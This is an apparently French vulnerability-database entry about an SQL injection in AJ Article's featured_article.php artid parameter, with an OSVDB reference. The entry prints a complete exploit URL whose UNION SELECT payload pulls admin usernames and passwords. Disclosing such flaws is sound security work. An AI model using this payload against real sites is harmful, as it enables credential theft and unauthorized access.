AJ-Article-featured_article.php-artid-Variable-SQL-Injection, vulnerabilities and axposures online database

Vulnerability details :

		AJ Article featured_article.php artid Parameter SQL Injection

Fiche

Fiche créée le 2008-05-16 02:31:22, dernière mise à jour le 2010-06-09 20:39:48

http://[target]/featured_article.php?mode=detail&page=search&artid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,CONCAT(0x3C666F6E7420636F6C6F723D22726564223E,username,char(58),admin_password,0x3C2F666F6E743E),6,7,8,9,10,11,12/**/FROM/**/admin/*

External refs :

OSVDB 45211

Free consultation (search)


		Fill one or some of the fields below :

		Vendor

		Title

		Vulnerability ref.





Free consultation (catalog)

Individual alerts


		You determine with one profile dynamic and assisted, all your material and software equipment. We shall inform you then automatically, as soon as a notification of security will concern one or several elements of it profile. Every notification is definite, consists of numerous information to determine risk and to protect itself from it.


Login:
Pass:


Free online subscription

Partenaires : Anti-spam - Hébergement France - MySQL Php Suisse - Hosting Canada - Web Php Maroc - WebmasterMalin
Guide de l'affiliation - Guide du paiement électronique et de l'e-currency - Annuaire du Web - Solution e-commerce - Externalisation et outsourcing
e-Marketing et e-Mailing - Comparaison de services - Comparateur Marchands - Bons plans par email - Tests de personnalité et de QI
SMS API - Forums et Petites Annonces Gratuites - Rencontres - Sonneries - Offres du Web - Arrêter de fumer - Guide des mobiles et PDA